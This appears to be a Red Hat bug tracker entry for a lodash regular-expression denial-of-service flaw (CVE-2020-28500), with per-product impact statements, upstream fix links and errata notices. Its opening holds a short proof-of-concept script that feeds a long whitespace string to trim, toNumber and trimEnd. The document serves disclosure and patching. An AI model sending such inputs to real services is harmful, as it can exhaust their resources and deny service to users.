All versions of package lodash; all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log("time_cost0: " + time_cost0) var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log("time_cost1: " + time_cost1) var time2 = Date.now(); lo.trimEnd(s) var time_cost2 = Date.now() - time2; console.log("time_cost2: " + time_cost2) Reference: https://snyk.io/vuln/SNYK-JS-LODASH-1018905
Created lodash tracking bugs for this issue: Affects: fedora-32 [bug 1928955] Created nodejs-lodash tracking bugs for this issue: Affects: epel-all [bug 1928956]
While Red Hat Quay has a dependency on lodash via restangular it doesn't use the vulnerable toNumber, trim, or trimEnd functions.
Upstream fix: https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7 [not merged as of yet]
Upstream commit: https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
Statement: In OpenShift ServiceMesh (OSSM) and Red Hat OpenShift Jaeger (RHOSJ) the affected containers are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-lodash library to authenticated users only, therefore the impact is low. While Red Hat Virtualization's cockpit-ovirt has a dependency on lodash it doesn't use the vulnerable toNumber, trim, or trimEnd functions. While Red Hat Quay has a dependency on lodash via restangular it doesn't use the vulnerable toNumber, trim, or trimEnd functions.
Did the code review again and found that though it uses lodash, but Not just the vulnerable functions which cause the ReDOS.Hence, marking it as "Not Affected".
This issue has been addressed in the following products: Red Hat Advanced Cluster Management for Kubernetes 2.2 for RHEL 8 Red Hat Advanced Cluster Management for Kubernetes 2.2 for RHEL 7 Via RHSA-2021:1168 https://access.redhat.com/errata/RHSA-2021:1168
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2020-28500
This issue has been addressed in the following products: Red Hat Virtualization Engine 4.4 Via RHSA-2021:2179 https://access.redhat.com/errata/RHSA-2021:2179
This issue has been addressed in the following products: Red Hat OpenShift Jaeger 1.20 Via RHSA-2021:2543 https://access.redhat.com/errata/RHSA-2021:2543
This issue has been addressed in the following products: Red Hat OpenShift Container Platform 4.8 Via RHSA-2021:2438 https://access.redhat.com/errata/RHSA-2021:2438
Updated the public data per @btarasso. The public date was incorrectly pointing to date when the vulnerability was disclosed to Snyk, not when it was fixed.
This issue has been addressed in the following products: Red Hat Advanced Cluster Management for Kubernetes 2.3 for RHEL 7 Red Hat Advanced Cluster Management for Kubernetes 2.3 for RHEL 8 Via RHSA-2021:3016 https://access.redhat.com/errata/RHSA-2021:3016
This issue has been addressed in the following products: Red Hat Virtualization 4 for Red Hat Enterprise Linux 8 Via RHSA-2021:3459 https://access.redhat.com/errata/RHSA-2021:3459
This issue has been addressed in the following products: Red Hat Migration Toolkit for Containers 1.7 Via RHSA-2022:6429 https://access.redhat.com/errata/RHSA-2022:6429